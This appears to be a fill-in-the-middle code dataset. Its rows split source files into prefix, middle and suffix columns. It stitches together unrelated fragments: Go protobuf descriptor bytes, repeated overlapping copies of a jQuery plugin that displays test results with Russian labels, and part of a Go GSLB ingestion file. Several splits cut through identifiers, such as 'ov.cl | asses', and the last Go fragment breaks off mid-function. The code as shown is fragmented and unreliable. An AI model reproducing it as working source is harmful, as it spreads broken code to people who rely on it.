0xc8, 0xaf, 0x6a, 0x54, 0x8b, 0xa0, 0xef, 0x46, 0x6e, 0x1d, 0x16, 0xc2, 0xfa, 0x85, 0xe2, 0x97,
0x05, 0x96, 0x14, 0xac, 0xdb, 0x1f, 0x37, 0xbe, 0x61, 0xd7, 0xe2, 0x3b, 0x06, 0x83, 0x51, 0x6b,
0xb7, 0x93, 0x58, 0xdb, 0xe0, 0xed, 0xf8, 0x53, 0x39, 0x0b, 0xc0, 0xe1, 0x1b, 0xdf, 0xe0, 0xa7,
0x32, 0x5b, 0xd8, 0xe3, 0x18, 0x24, 0xd6, 0x0e, 0x0f, 0xe0, 0xbf, 0xe5, 0x76, 0xee, 0xb5, 0x0a,
0x27, 0xb0, 0xb5, 0xfa, 0x4a, 0xef, 0xc3, 0x72, 0x7c, 0x08, 0xcf, 0x85, 0x74, 0x32, 0x54, 0x4a,
0x5e, 0x2f, 0x56, 0x2b, 0x72, 0xbc, 0x79, 0x5b, 0x92, 0x89, 0x69, 0x6b, 0xd2, 0x9a, 0xf6, 0x6c,
0x7f, 0x7b, 0x7f, 0x02, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xed, 0x07, 0x53, 0x12, 0x06, 0x00, 0x00,
}
| {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
} | identifier_body |
1602.object_view.js | /*
Structure: objectView
*/
$.ov = {
views:[],
objectMemberValue: function(x){/* {{{ */
var val;
switch(typeof x){
case 'boolean':
val = '<input type="checkbox" '+(x?'checked ':'')+'/>';
break;
case 'number':
val = '<pre style="color:blue">'+x+'</pre>';
break;
case 'string':
val = '<pre style="color:red;max-height:300px;overflow:auto;">"'+String(x).substr(0,50).replace(/</g,'<')+'"</pre>';
break;
case 'function':
val = 'function';
break;
default:
case 'object':
val = x;
break;
}
return val;
/* }}} */
},
objectToRows: function(ovid,path,className){/* {{{ */
var level = path.length;
var pathStr = path.join('.');
var view = this.views[ovid];
var obj = view.object;
var exp = view.expanded;
for(var i in path)obj = obj[path[i]];
var r = '';
if(typeof className == 'undefined')className = obj.className;
var cl = this.classes[className];
var isCollection =
(obj.constructor==Array)
||
(typeof obj == 'object' && cl && cl.collection && cl.collection.exceptedIndex && !obj[cl.collection.exceptedIndex]);
if(cl && !isCollection){ // the object model has a class description for this object and it is not a collection
for(var i in cl.members){
var x = obj[i];
var mem = cl.members[i];
if(typeof x == 'undefined' && !mem.calculated){
if(mem.notNull || typeof mem.editing == 'undefined'){
if(/^_{2}[a-z]$/.test(i)){
r+='<tr><th colspan="2">'+mem+'</th></tr>';
}
continue;
}
x = mem.editing.defaultValue;
}
var newPathStr = pathStr+(level>0?'.':'')+i;
var label = i;
var value = x;
// Edit the member when editing is enabled for the class
// and not disabled for the member,
// or enabled for the member and not disabled for the class,
// and, if the member is an object, only when an editing descriptor is defined for it
if(
(
(cl.editing && !(mem.editing===false))
||
(!cl.editing && mem.editing)
)&&(
!(typeof x == 'object' && typeof mem.editing != 'object')
)
){ // Edit
var type = (mem.editing&&mem.editing.type)?mem.editing.type:mem.editing;
switch(type){
case 'textarea':
value = '<textarea path="'+newPathStr+'" rows="'+(mem.editing&&mem.editing.rows?mem.editing.rows:3)+'" onblur="$.ov.saveValue(this);">'+String(x).replace(/</g,'<')+'</textarea>';
break;
case 'password':
case 'text':
default:
value = '<input type="'+(type=='password'?type:'text')+'" path="'+newPathStr+'" value="'+String(x).replace(/\"/g,'"').replace(/[\n\r]/,"")+'" onblur="$.ov.saveValue(this);" />';
break;
case 'select':
var opts = '';
for(var i in mem.editing.opts){
opts+='<option '+(x==mem.editing.opts[i]?'selected':'')+'>'+mem.editing.opts[i]+'</option>';
}
value = '<select path="'+newPathStr+'" onchange="$.ov.saveValue(this);">'+opts+'</select>';
break;
}
}else{ // Readonly
var c = $.ov.classes[mem.className];
if(typeof mem.asString == 'function'){
value = mem.asString.apply(obj,[x]);
}else if(c){
if(c.collection && typeof c.collection.value == 'function')
value = $.ov.classes[mem.className].collection.value.apply(x);
}
}
if(typeof mem == 'string'){
label = mem;
}else if(typeof mem == 'object' && mem.label){
label = mem.label;
}
var levelup = 'class="likealink" onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(mem.className?',\''+mem.className+'\'':'')+')"';
var is_levelup = false;
if(typeof x == 'object')for(var xxx in x){is_levelup = true; break;}
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || mem.defaultExpanded);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(mem.className?'iclass="'+mem.className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+value+'</td></tr>';
// Recursively render the expanded descendants
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),mem.className);
}
}else{ // no class description was found for the object, or the object is a collection
for(var i in obj){
try{
var x = obj[i];
}catch(e){
continue;
}
var defExp = false;
if(cl && isCollection){
var vis = cl.collection.visible;
if(typeof vis == 'function' && !vis(i,obj[i]))continue;
var label = typeof cl.collection.index == 'function'?cl.collection.index.apply(obj[i],[i,obj[i]]):i;
var val = typeof cl.collection.value == 'function'?cl.collection.value.apply(obj[i]):obj[i];
var is_levelup = (typeof cl.collection.expandable == 'undefined' && typeof x == 'object')?true:!!cl.collection.expandable;
defExp = !!cl.collection.defaultExpanded;
}else{
var label = i;
var val = this.objectMemberValue(x);
var is_levelup = false;
if(typeof x != 'string')for(var xxx in x){is_levelup = true; break;}
}
var newPathStr = pathStr+(level>0?'.':'')+i;
var levelup = ' onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(cl?',\''+className+'\'':'')+')"';
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || defExp);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(cl?'iclass="'+className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+val+'</td></tr>';
// Recursively render the expanded descendants
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),(cl?className:void(0)));
}
}
if(r=='')r='<tr level="'+level+'"><td class="ovColMain" style="padding-left:'+(15*level)+'px">empty</td><td class="ovColumn">empty</td></tr>';
// Mark this node as "expanded"
if(level>0)exp.push(pathStr);
return r;
/* }}} */
},
saveValue: function(el){/* {{{ */
var tag = el.tagName.toLowerCase();
switch(tag){
case 'select':
case 'textarea':
case 'input':
// Stop if nothing has changed
if(tag !='select' && el.defaultValue==el.value)return;
// Resolve the target object and its value
var ovid = el.parentNode.parentNode.parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
var obj = $.ov.views[ovid].object;
var path = el.attributes.path.nodeValue.split('.');
var last = path.pop();
for(var i in path)obj = obj[path[i]];
// Store the value in the object
el.defaultValue = el.value;
obj[last] = el.value;
// Update the parent row (if any)
var tr = el.parentNode.parentNode;
var curLevel = Number(tr.attributes.level.nodeValue);
var sibling = tr.previousSibling;
if(curLevel>0){
while(sibling && Number(sibling.attributes.level.nodeValue)==curLevel)
sibling=sibling.previousSibling;
}
if(sibling){ // found the table row that contains the parent
var cl = $.ov.classes[sibling.attributes.iclass.nodeValue];
sibling.childNodes[1].innerHTML = typeof cl.collection.value == 'function'?cl.collection.value(obj):obj;
}
break;
}
/* }}} */
},
handleAction: function(ovid,path,index,field,className){
$.ov.classes[className].members[field].action.apply($.ov.views[ovid].object[path][index]);
},
classes:{}
};
/* {{{ */
$.ov.classes.userTesting = {
members:{
subject: 'Предмет',
script: 'Сценарий',
userName: 'Тестируемый',
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
attempts: {
label: 'Попытки',
asString: function(x){
var n = x.length;
if(n%10>4 || n%10==0 || (n>10 && n<20)) return n+' попыток';
if(n%10==1) return n+' попытка';
return n+' попытки';
},
className: 'testAttempt',
defaultExpanded: true
}
}
};
$.ov.classes.testAttempt= {
members:{
timeBegin: {
label:'Открыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
timeEnd: {
label:'Закрыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
themes: {
label: 'Заданные вопросы',
className: 'testTheme',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Попытка №'+(Number(i)+1);
},
value: function(){
return (Math.round(Number(this.result)*10)/10)+'%';
},
defaultExpanded: true,
expandable: true
}
};
$.ov.classes.testTheme = {
members:{
themeName: 'Название',
questCount: 'Кол-во вопросов',
correctAns: 'Отвечено верно',
result: {
calculated: true,
label: 'Результат по теме',
asString: function(){return Math.round((this.correctAns/this.questCount)*1000)/10+'%';}
},
questions: {
label: 'Вопросы темы',
className: 'testQuestion',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection:{
index: function(i,val){
return 'Тема №'+(Number(i)+1);
},
value: function(val){
return '<b>'+this.themeName+'</b> (отвечено верно <b style="color:blue">'+this.correctAns+'</b> из '+this.questCount+')';
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testQuestion = {
members:{
answers:{
label: 'Ответы',
className: 'testAnswer',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Вопрос '+(Number(i)+1);
},
value: function(val){
if(globals.godMode){
var correct = true;
for(var j in this.answers)if(this.answers[j].isCorrect!=this.answers[j].userAnswer)correct = false;
return '<span style="font-weight:700;color:'+(correct?'green':'red')+'">'+this.content+'</span>';
}else{
return this.content;
}
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testAnswer = {
members:{},
collection:{
index: function(i,val){
console.log(this);
return '<input type="'+(this.t==1?'radio':'checkbox')+'" disabled '+(this.userAnswer===1?'checked':'')+' />';
},
value: function(val){
return this.content+(globals.godMode && this.isCorrect===1?' <b style="color:green;">(правильный ответ)</b>':'');
},
defaultExpanded: false,
expandable: false
}
}
/* }}} */
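/*
Illustrative sketch (hypothetical class name and fields): a new class model is registered
the same way as the definitions above — "members" controls labels and formatting of known
fields, "collection" controls how a list of such objects is indexed and summarised.
$.ov.classes.myClass = {
	members:{
		title: 'Title',
		created: { label:'Created', asString:function(x){ return x?x.toDate().asFormat():''; } }
	},
	collection:{
		index: function(i,val){ return 'Item '+(Number(i)+1); },
		value: function(val){ return this.title; },
		expandable: true
	}
};
*/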
/*
Function: objectView
*jQuery-plugin* for displaying an object
Parameters:
obj - Object to display
className - *string* Class name
*/
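/*
Example (illustrative; the element id and data variable are assumptions):
	$('#testResults').objectView(testingData, 'userTesting');
Expanding or collapsing a nested row re-invokes objectView internally with a
dot-separated path string instead of an object.
*/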
$.fn.objectView = function(obj,className){/* {{{ */
var path;
if(typeof obj == 'string')
path = obj.split('.'); // assume a key can never contain a dot
else
path = [];
var level = path.length;
if(level==0){
var ovid = this.attr('ovid');
if(!ovid){
ovid = $.ov.views.length;
this.attr('ovid',ovid);
$.ov.views.push({
object:obj,
expanded:[]
});
}else{
$.ov.views[ovid].object = obj;
$.ov.views[ovid].expanded = [];
}
}else{
var tmp = this;
var tmp2;
ovid = this[0].parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
if(this.attr('expanded')==1){
var curlevel = this.attr('level');
tmp = tmp.next('tr');
while(true){
if(tmp.attr('level')<=curlevel || tmp.size()==0)break;
tmp2 = tmp.next('tr');
tmp.remove();
tmp = tmp2;
}
this.attr('expanded',0);
var pathStr = path.join('.');
var exp = $.ov.views[ovid].expanded;
for(var i in exp)if(exp[i]==pathStr)delete exp[i];
return this;
}
this.attr('expanded',1);
obj = $.ov.views[ovid];
}
var r = $.ov.objectToRows(ovid,path,className);
if(level == 0){
if(this.children('table.objectView').size()==0)
this.html('<table class="objectView" cellspacing="0"><thead><tr><th colspan="Object View"></th></tr></thead><tbody></tbody></table>');
var tbody = this.children('table.objectView tbody');
tbody.html(r);
}else{
this.after(r);
}
/* }}} */
}
$.fn.objectXView = function(obj,className){
if(!$.ov.classes[className])return false;
| var objectPlace = $('div#ov',this);
if(objectPlace.size()==0){
var initHtml = '<div id="ov" style="margin-bottom:10px;"></div>';
var t = '';
var c = '';
for(var i in cs){
var cc = $.ov.classes[cs[i]];
if(!cc)continue;
t+='<li><a href="#"><span>'+(cc.collectionTitle || i)+'</span></a></li>';
c+='<div id="'+i+'" class="tabPageUnbounded"></div>';
}
if(c!=''){
initHtml += '<div id="tabs"><ul>'+t+'</ul>'+c+'</div>';
}
this.html(initHtml).find('div#tabs').tabs();
objectPlace = $('div#ov',this);
}
objectPlace.objectView(obj,className);
var ovid = parseInt(objectPlace.attr('ovid'));
for(var i in cs){
var cn = cs[i];
if(!$.ov.classes[cn])continue;
var m = $.ov.classes[cn].members;
var t = '<table class="tab3d" cellspacing="0" cellpadding="3"><thead><tr>';
var colcount = 0;
for(var j in m){
t+='<th>'+(typeof m[j]=='object'?m[j].label:m[j])+'</th>';
colcount++;
}
t+='</tr></thead><tbody>';
var rowcount = 0;
for(var j in obj[i]){
t+='<tr>';
for(var k in m){
var v = obj[i][j][k];
if(m[k].action)
t+='<td><span class="likealink" onclick="$.ov.handleAction('+ovid+',\''+i+'\','+j+',\''+k+'\',\''+cn+'\')">'+v+'</span></td>';
else
t+='<td>'+v+'</td>';
}
t+='</tr>';
rowcount++;
}
if(rowcount==0)t+='<tr><td colspan="'+colcount+'" style="padding:50px;"><center>нет данных</center></td></tr>';
t+='</tbody></table>';
this.find('#tabs #'+i).html(t);
}
}; | var cs = $.ov.classes[className].collections;
| random_line_split |
1602.object_view.js | /*
Structure: objectView
*/
$.ov = {
views:[],
objectMemberValue: function(x){/* {{{ */
var val;
switch(typeof x){
case 'boolean':
val = '<input type="checkbox" '+(x?'checked ':'')+'/>';
break;
case 'number':
val = '<pre style="color:blue">'+x+'</pre>';
break;
case 'string':
val = '<pre style="color:red;max-height:300px;overflow:auto;">"'+String(x).substr(0,50).replace(/</g,'<')+'"</pre>';
break;
case 'function':
val = 'function';
break;
default:
case 'object':
val = x;
break;
}
return val;
/* }}} */
},
objectToRows: function(ovid,path,className){/* {{{ */
var level = path.length;
var pathStr = path.join('.');
var view = this.views[ovid];
var obj = view.object;
var exp = view.expanded;
for(var i in path)obj = obj[path[i]];
var r = '';
if(typeof className == 'undefined')className = obj.className;
var cl = this.classes[className];
var isCollection =
(obj.constructor==Array)
||
(typeof obj == 'object' && cl && cl.collection && cl.collection.exceptedIndex && !obj[cl.collection.exceptedIndex]);
if(cl && !isCollection){ // the object model has a class description for this object and it is not a collection
for(var i in cl.members){
var x = obj[i];
var mem = cl.members[i];
if(typeof x == 'undefined' && !mem.calculated){
if(mem.notNull || typeof mem.editing == 'undefined'){
if(/^_{2}[a-z]$/.test(i)){
r+='<tr><th colspan="2">'+mem+'</th></tr>';
}
continue;
}
x = mem.editing.defaultValue;
}
var newPathStr = pathStr+(level>0?'.':'')+i;
var label = i;
var value = x;
// Edit the member when editing is enabled for the class
// and not disabled for the member,
// or enabled for the member and not disabled for the class,
// and, if the member is an object, only when an editing descriptor is defined for it
if(
(
(cl.editing && !(mem.editing===false))
||
(!cl.editing && mem.editing)
)&&(
!(typeof x == 'object' && typeof mem.editing != 'object')
)
){ // Edit
var type = (mem.editing&&mem.editing.type)?mem.editing.type:mem.editing;
switch(type){
case 'textarea':
value = '<textarea path="'+newPathStr+'" rows="'+(mem.editing&&mem.editing.rows?mem.editing.rows:3)+'" onblur="$.ov.saveValue(this);">'+String(x).replace(/</g,'<')+'</textarea>';
break;
case 'password':
case 'text':
default:
value = '<input type="'+(type=='password'?type:'text')+'" path="'+newPathStr+'" value="'+String(x).replace(/\"/g,'"').replace(/[\n\r]/,"")+'" onblur="$.ov.saveValue(this);" />';
break;
case 'select':
var opts = '';
for(var i in mem.editing.opts){
opts+='<option '+(x==mem.editing.opts[i]?'selected':'')+'>'+mem.editing.opts[i]+'</option>';
}
value = '<select path="'+newPathStr+'" onchange="$.ov.saveValue(this);">'+opts+'</select>';
break;
}
}else{ // Readonly
var c = $.ov.classes[mem.className];
if(typeof mem.asString == 'function'){
value = mem.asString.apply(obj,[x]);
}else if(c){
if(c.collection && typeof c.collection.value == 'function')
value = $.ov.cl | ',\''+mem.className+'\'':'')+')"';
var is_levelup = false;
if(typeof x == 'object')for(var xxx in x){is_levelup = true; break;}
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || mem.defaultExpanded);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(mem.className?'iclass="'+mem.className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+value+'</td></tr>';
// Recursively render the expanded descendants
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),mem.className);
}
}else{ // no class description was found for the object, or the object is a collection
for(var i in obj){
try{
var x = obj[i];
}catch(e){
continue;
}
var defExp = false;
if(cl && isCollection){
var vis = cl.collection.visible;
if(typeof vis == 'function' && !vis(i,obj[i]))continue;
var label = typeof cl.collection.index == 'function'?cl.collection.index.apply(obj[i],[i,obj[i]]):i;
var val = typeof cl.collection.value == 'function'?cl.collection.value.apply(obj[i]):obj[i];
var is_levelup = (typeof cl.collection.expandable == 'undefined' && typeof x == 'object')?true:!!cl.collection.expandable;
defExp = !!cl.collection.defaultExpanded;
}else{
var label = i;
var val = this.objectMemberValue(x);
var is_levelup = false;
if(typeof x != 'string')for(var xxx in x){is_levelup = true; break;}
}
var newPathStr = pathStr+(level>0?'.':'')+i;
var levelup = ' onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(cl?',\''+className+'\'':'')+')"';
var expanded = is_levelup && (cm_in_array(exp,newPathStr) || x.__ov_expanded || defExp);
r+='<tr level="'+level+'" expanded="'+(expanded?1:0)+'" '+(cl?'iclass="'+className+'"':'')+'><td class="'+(is_levelup?'likealink ':'')+'ovColMain" style="padding-left:'+(15*level+3)+'px" '+(is_levelup?levelup:'')+'>'+label+'</td><td class="ovColumn">'+val+'</td></tr>';
// Recursively render the expanded descendants
if(expanded)r+=$.ov.objectToRows(ovid,newPathStr.split('.'),(cl?className:void(0)));
}
}
if(r=='')r='<tr level="'+level+'"><td class="ovColMain" style="padding-left:'+(15*level)+'px">empty</td><td class="ovColumn">empty</td></tr>';
// Mark this node as "expanded"
if(level>0)exp.push(pathStr);
return r;
/* }}} */
},
saveValue: function(el){/* {{{ */
var tag = el.tagName.toLowerCase();
switch(tag){
case 'select':
case 'textarea':
case 'input':
// Stop if nothing has changed
if(tag !='select' && el.defaultValue==el.value)return;
// Resolve the target object and its value
var ovid = el.parentNode.parentNode.parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
var obj = $.ov.views[ovid].object;
var path = el.attributes.path.nodeValue.split('.');
var last = path.pop();
for(var i in path)obj = obj[path[i]];
// Store the value in the object
el.defaultValue = el.value;
obj[last] = el.value;
// Update the parent row (if any)
var tr = el.parentNode.parentNode;
var curLevel = Number(tr.attributes.level.nodeValue);
var sibling = tr.previousSibling;
if(curLevel>0){
while(sibling && Number(sibling.attributes.level.nodeValue)==curLevel)
sibling=sibling.previousSibling;
}
if(sibling){ // found the table row that contains the parent
var cl = $.ov.classes[sibling.attributes.iclass.nodeValue];
sibling.childNodes[1].innerHTML = typeof cl.collection.value == 'function'?cl.collection.value(obj):obj;
}
break;
}
/* }}} */
},
handleAction: function(ovid,path,index,field,className){
$.ov.classes[className].members[field].action.apply($.ov.views[ovid].object[path][index]);
},
classes:{}
};
/* {{{ */
$.ov.classes.userTesting = {
members:{
subject: 'Предмет',
script: 'Сценарий',
userName: 'Тестируемый',
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
attempts: {
label: 'Попытки',
asString: function(x){
var n = x.length;
if(n%10>4 || n%10==0 || (n>10 && n<20)) return n+' попыток';
if(n%10==1) return n+' попытка';
return n+' попытки';
},
className: 'testAttempt',
defaultExpanded: true
}
}
};
$.ov.classes.testAttempt= {
members:{
timeBegin: {
label:'Открыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
timeEnd: {
label:'Закрыта',
asString:function(x){
return x?x.toDate().asFormat():'';
}
},
result: {
label: 'Результат',
asString: function(){return '<b>'+String(Math.round(Number(this.result)*10)/10)+'%</b>';}
},
themes: {
label: 'Заданные вопросы',
className: 'testTheme',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Попытка №'+(Number(i)+1);
},
value: function(){
return (Math.round(Number(this.result)*10)/10)+'%';
},
defaultExpanded: true,
expandable: true
}
};
$.ov.classes.testTheme = {
members:{
themeName: 'Название',
questCount: 'Кол-во вопросов',
correctAns: 'Отвечено верно',
result: {
calculated: true,
label: 'Результат по теме',
asString: function(){return Math.round((this.correctAns/this.questCount)*1000)/10+'%';}
},
questions: {
label: 'Вопросы темы',
className: 'testQuestion',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection:{
index: function(i,val){
return 'Тема №'+(Number(i)+1);
},
value: function(val){
return '<b>'+this.themeName+'</b> (отвечено верно <b style="color:blue">'+this.correctAns+'</b> из '+this.questCount+')';
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testQuestion = {
members:{
answers:{
label: 'Ответы',
className: 'testAnswer',
defaultExpanded: true,
asString: function(){
return '';
}
}
},
collection: {
index: function(i,val){
return 'Вопрос '+(Number(i)+1);
},
value: function(val){
if(globals.godMode){
var correct = true;
for(var j in this.answers)if(this.answers[j].isCorrect!=this.answers[j].userAnswer)correct = false;
return '<span style="font-weight:700;color:'+(correct?'green':'red')+'">'+this.content+'</span>';
}else{
return this.content;
}
},
defaultExpanded: false,
expandable: true
}
};
$.ov.classes.testAnswer = {
members:{},
collection:{
index: function(i,val){
console.log(this);
return '<input type="'+(this.t==1?'radio':'checkbox')+'" disabled '+(this.userAnswer===1?'checked':'')+' />';
},
value: function(val){
return this.content+(globals.godMode && this.isCorrect===1?' <b style="color:green;">(правильный ответ)</b>':'');
},
defaultExpanded: false,
expandable: false
}
}
/* }}} */
/*
Function: objectView
*jQuery-plugin* for displaying an object
Parameters:
obj - Object to display
className - *string* Class name
*/
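/*
Example (illustrative; the element id and data variable are assumptions):
	$('#testResults').objectView(testingData, 'userTesting');
Expanding or collapsing a nested row re-invokes objectView internally with a
dot-separated path string instead of an object.
*/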
$.fn.objectView = function(obj,className){/* {{{ */
var path;
if(typeof obj == 'string')
path = obj.split('.'); // assume a key can never contain a dot
else
path = [];
var level = path.length;
if(level==0){
var ovid = this.attr('ovid');
if(!ovid){
ovid = $.ov.views.length;
this.attr('ovid',ovid);
$.ov.views.push({
object:obj,
expanded:[]
});
}else{
$.ov.views[ovid].object = obj;
$.ov.views[ovid].expanded = [];
}
}else{
var tmp = this;
var tmp2;
ovid = this[0].parentNode.parentNode.parentNode.attributes.ovid.nodeValue;
if(this.attr('expanded')==1){
var curlevel = this.attr('level');
tmp = tmp.next('tr');
while(true){
if(tmp.attr('level')<=curlevel || tmp.size()==0)break;
tmp2 = tmp.next('tr');
tmp.remove();
tmp = tmp2;
}
this.attr('expanded',0);
var pathStr = path.join('.');
var exp = $.ov.views[ovid].expanded;
for(var i in exp)if(exp[i]==pathStr)delete exp[i];
return this;
}
this.attr('expanded',1);
obj = $.ov.views[ovid];
}
var r = $.ov.objectToRows(ovid,path,className);
if(level == 0){
if(this.children('table.objectView').size()==0)
this.html('<table class="objectView" cellspacing="0"><thead><tr><th colspan="Object View"></th></tr></thead><tbody></tbody></table>');
var tbody = this.children('table.objectView tbody');
tbody.html(r);
}else{
this.after(r);
}
/* }}} */
}
$.fn.objectXView = function(obj,className){
if(!$.ov.classes[className])return false;
var cs = $.ov.classes[className].collections;
var objectPlace = $('div#ov',this);
if(objectPlace.size()==0){
var initHtml = '<div id="ov" style="margin-bottom:10px;"></div>';
var t = '';
var c = '';
for(var i in cs){
var cc = $.ov.classes[cs[i]];
if(!cc)continue;
t+='<li><a href="#"><span>'+(cc.collectionTitle || i)+'</span></a></li>';
c+='<div id="'+i+'" class="tabPageUnbounded"></div>';
}
if(c!=''){
initHtml += '<div id="tabs"><ul>'+t+'</ul>'+c+'</div>';
}
this.html(initHtml).find('div#tabs').tabs();
objectPlace = $('div#ov',this);
}
objectPlace.objectView(obj,className);
var ovid = parseInt(objectPlace.attr('ovid'));
for(var i in cs){
var cn = cs[i];
if(!$.ov.classes[cn])continue;
var m = $.ov.classes[cn].members;
var t = '<table class="tab3d" cellspacing="0" cellpadding="3"><thead><tr>';
var colcount = 0;
for(var j in m){
t+='<th>'+(typeof m[j]=='object'?m[j].label:m[j])+'</th>';
colcount++;
}
t+='</tr></thead><tbody>';
var rowcount = 0;
for(var j in obj[i]){
t+='<tr>';
for(var k in m){
var v = obj[i][j][k];
if(m[k].action)
t+='<td><span class="likealink" onclick="$.ov.handleAction('+ovid+',\''+i+'\','+j+',\''+k+'\',\''+cn+'\')">'+v+'</span></td>';
else
t+='<td>'+v+'</td>';
}
t+='</tr>';
rowcount++;
}
if(rowcount==0)t+='<tr><td colspan="'+colcount+'" style="padding:50px;"><center>нет данных</center></td></tr>';
t+='</tbody></table>';
this.find('#tabs #'+i).html(t);
}
};
| asses[mem.className].collection.value.apply(x);
}
}
if(typeof mem == 'string'){
label = mem;
}else if(typeof mem == 'object' && mem.label){
label = mem.label;
}
var levelup = 'class="likealink" onclick="$(this.parentNode).objectView(\''+newPathStr+'\''+(mem.className? | conditional_block |
dq_ingestion.go | /*
* Copyright 2019-2020 VMware, Inc.
* All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package nodes
import (
"errors"
"sync"
"github.com/davecgh/go-spew/spew"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/gslbutils"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/k8sobjects"
"github.com/vmware/load-balancer-and-ingress-services-for-kubernetes/pkg/utils"
)
func DeriveGSLBServiceName(hostname string) string {
// This function is a place-holder for deriving the GSLB service name
// For now, the hostname of a route is the GSLB Service name
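// e.g. an accepted route with host "app.example.com" (illustrative value) currently
// yields a GSLB service named "app.example.com"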
return hostname
}
func PublishKeyToRestLayer(tenant, gsName, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occured while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func getObjFromStore(objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
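// AddUpdateObjOperation (summary comment added for readability): fetches the accepted
// object from the store, derives the GS name from its hostname, creates or updates the
// corresponding AviGS graph model, and publishes the model key to the rest layer unless
// both the GS and health-monitor checksums are unchanged.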
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) |
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
